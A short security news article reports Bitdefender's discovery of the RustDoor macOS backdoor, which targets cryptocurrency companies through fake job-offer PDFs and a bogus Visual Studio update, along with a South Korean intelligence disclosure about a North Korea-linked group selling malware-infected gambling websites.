Cryptocurrency Sector Targeted by Sophisticated macOS Backdoor RustDoor
A newly discovered Apple macOS backdoor, dubbed RustDoor, has targeted several cryptocurrency companies. Bitdefender revealed RustDoor as a Rust-based malware that masquerades as a Visual Studio update.
It can harvest and upload files, gather system information, and is distributed via fake job offering PDFs. The attack chain includes ZIP archives containing shell scripts to fetch the implant from a website, turkishfurniture[.]blog, along with decoy PDFs. Bitdefender uncovered additional first-stage payloads posing as job offerings predating RustDoor binaries by almost a month. Four new Golang-based binaries communicate with a domain controlled by the threat actor, collecting system and network information using macOS utilities. They extract disk details and kernel configurations, while a leaky command-and-control endpoint reveals information about infected victims. Meanwhile, South Korea’s National Intelligence Service disclosed that an IT organization linked to North Korea’s Workers’ Party is generating revenue by selling malware-infected gambling websites. Gyeongheung, a 15-member entity based in Dandong, allegedly received payments for creating and maintaining these websites for cybercriminals. An unidentified South Korean criminal organization paid $5,000 for a single website and $3,000 monthly for maintenance.
The revelation of RustDoor targeting cryptocurrency companies underscores the growing threat landscape facing digital assets. Its sophisticated distribution method and capabilities highlight the need for robust cybersecurity measures in the cryptocurrency sector. Additionally, the involvement of North Korean-affiliated groups in illicit activities further amplifies concerns over state-sponsored cybercrime.
The monetization of malware-laced gambling websites demonstrates the evolving tactics of cybercriminal organizations to exploit unsuspecting victims for financial gain. As such, vigilance and collaboration among cybersecurity experts and law enforcement agencies are crucial in combating these threats and safeguarding against potential breaches.
